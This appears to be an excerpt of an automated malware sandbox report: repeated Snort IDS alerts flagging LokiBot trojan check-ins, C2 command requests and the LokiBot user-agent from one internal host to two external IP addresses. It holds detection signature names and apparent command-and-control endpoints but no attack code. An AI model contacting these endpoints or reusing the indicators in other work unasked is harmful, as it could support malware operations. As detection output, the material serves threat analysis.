            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49800 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49801 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49801 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49801 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49801 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49802 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49802 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49802 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49802 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49803 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49803 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49803 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49803 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49804 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49804 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49804 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49804 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49805 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49805 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49805 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49805 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49806 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49806 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49806 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49806 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49807 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49807 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49807 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49807 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49808 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49808 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49808 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49808 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49809 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49809 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49809 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49809 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49810 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49810 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49810 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49810 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49811 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49811 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49811 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49811 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49812 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49812 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49812 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49812 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49813 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49813 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49813 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49813 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49814 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49814 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49814 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49814 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49815 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49815 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49815 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49815 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49816 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49816 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49816 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49816 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49817 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49817 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49817 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49817 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49818 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49818 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49818 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49818 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49819 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49819 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49819 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49819 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49820 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49820 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49820 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49820 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49821 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49821 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49821 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49821 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49822 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49822 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49822 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49822 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49823 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49823 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49823 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49823 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49824 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49824 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49824 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49824 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49825 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49825 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49825 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49825 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49826 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49826 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49826 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49826 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49827 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49827 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49827 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49827 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49828 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49828 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49828 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49828 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49829 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49829 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49829 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49829 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49830 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49830 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49830 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49830 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49831 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49831 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49831 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49831 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49832 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49832 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49832 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49832 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49833 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49833 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49833 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49833 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49834 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49834 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49834 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49834 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49835 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49835 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49835 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49835 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49836 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49836 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49836 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49836 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49837 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49837 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49837 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49837 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49838 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49838 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49838 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49838 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49839 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49839 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49839 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49839 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49840 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49840 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49840 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49840 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49841 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49841 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49841 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49841 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49842 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49842 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49842 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49842 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49843 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49843 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49843 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49843 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49844 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49844 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49844 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49844 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49845 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49845 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49845 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49845 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49846 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49846 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49846 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49846 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49847 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49847 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49847 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49847 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49848 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49848 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49848 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49848 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49849 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49849 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49849 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49849 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49850 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49850 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49850 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49850 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49851 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49851 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49851 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49851 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49852 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49852 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49852 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49852 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49853 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49853 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49853 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49853 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49854 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49854 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49854 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49854 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49855 -> 104.28.4.154:80
